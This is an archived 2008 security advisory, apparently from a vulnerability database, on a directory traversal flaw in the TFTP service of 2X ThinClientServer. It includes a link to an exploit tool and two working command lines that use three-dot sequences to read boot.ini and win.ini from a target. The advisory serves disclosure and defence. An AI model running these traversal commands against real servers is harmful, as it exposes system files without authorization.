Directory traversal in 2X ThinClientServer v5.0_sp1-r3497

2008-04-01T00:00:00

Description

####################################################################### Luigi Auriemma Application: 2X ThinClientServer http://www.2x.com/thinclientserver/ Versions: <= v5.0_sp1-r3497 (TFTPd.exe <= 3.2.0.0) Platforms: Windows Bug: directory traversal Exploitation: remote Date: 29 Mar 2008 Author: Luigi Auriemma e-mail: aluigi@autistici.org web: aluigi.org ####################################################################### 1) Introduction 2) Bug 3) The Code 4) Fix ####################################################################### =============== 1) Introduction =============== From the manual: "2X ThinClientServer allows you to deploy a thin client OS to low-cost thin client devices and existing PCs, and centrally manage settings and configure to which terminal servers (Windows or Linux) a user should log on to." ####################################################################### ====== 2) Bug ====== The 2X TFTP Service enabled by default in ThinClientServer is affected by a directory traversal vulnerability exploitable through the usage of a sequence of 3 dots (instead of the classical two) for reaching the various parent directories. ####################################################################### =========== 3) The Code =========== http://aluigi.org/testz/tftpx.zip tftpx SERVER .../.../.../.../.../.../boot.ini none tftpx SERVER ...\...\...\...\...\...\windows\win.ini none ####################################################################### ====== 4) Fix ====== No fix ####################################################################### --- Luigi Auriemma http://aluigi.org

{"id": "SECURITYVULNS:DOC:19546", "bulletinFamily": "software", "title": "Directory traversal in 2X ThinClientServer v5.0_sp1-r3497", "description": "\r\n#######################################################################\r\n\r\n Luigi Auriemma\r\n\r\nApplication: 2X ThinClientServer\r\n http://www.2x.com/thinclientserver/\r\nVersions: <= v5.0_sp1-r3497\r\n (TFTPd.exe <= 3.2.0.0)\r\nPlatforms: Windows\r\nBug: directory traversal\r\nExploitation: remote\r\nDate: 29 Mar 2008\r\nAuthor: Luigi Auriemma\r\n e-mail: aluigi@autistici.org\r\n web: aluigi.org\r\n\r\n\r\n#######################################################################\r\n\r\n\r\n1) Introduction\r\n2) Bug\r\n3) The Code\r\n4) Fix\r\n\r\n\r\n#######################################################################\r\n\r\n===============\r\n1) Introduction\r\n===============\r\n\r\n\r\nFrom the manual:\r\n"2X ThinClientServer allows you to deploy a thin client OS to low-cost\r\nthin client devices and existing PCs, and centrally manage settings and\r\nconfigure to which terminal servers (Windows or Linux) a user should\r\nlog on to."\r\n\r\n\r\n#######################################################################\r\n\r\n======\r\n2) Bug\r\n======\r\n\r\n\r\nThe 2X TFTP Service enabled by default in ThinClientServer is affected\r\nby a directory traversal vulnerability exploitable through the usage of\r\na sequence of 3 dots (instead of the classical two) for reaching the\r\nvarious parent directories.\r\n\r\n\r\n#######################################################################\r\n\r\n===========\r\n3) The Code\r\n===========\r\n\r\n\r\nhttp://aluigi.org/testz/tftpx.zip\r\n\r\n tftpx SERVER .../.../.../.../.../.../boot.ini none\r\n tftpx SERVER ...\...\...\...\...\...\windows\win.ini none\r\n\r\n\r\n#######################################################################\r\n\r\n======\r\n4) Fix\r\n======\r\n\r\n\r\nNo fix\r\n\r\n\r\n#######################################################################\r\n\r\n\r\n--- \r\nLuigi Auriemma\r\nhttp://aluigi.org", "published": "2008-04-01T00:00:00", "modified": "2008-04-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:19546", "reporter": "Securityvulns", "references": [], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:10:25", "edition": 1, "viewCount": 15, "enchantments": {"score": {"value": 2.3, "vector": "NONE"}, "dependencies": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:8851"]}], "rev": 4}, "backreferences": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:8851"]}]}, "exploitation": null, "vulnersScore": 2.3}, "affectedSoftware": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645497317, "score": 1659803227}, "_internal": {"score_hash": "a1664b3393c8f34b5165bcb399a8d7bf"}}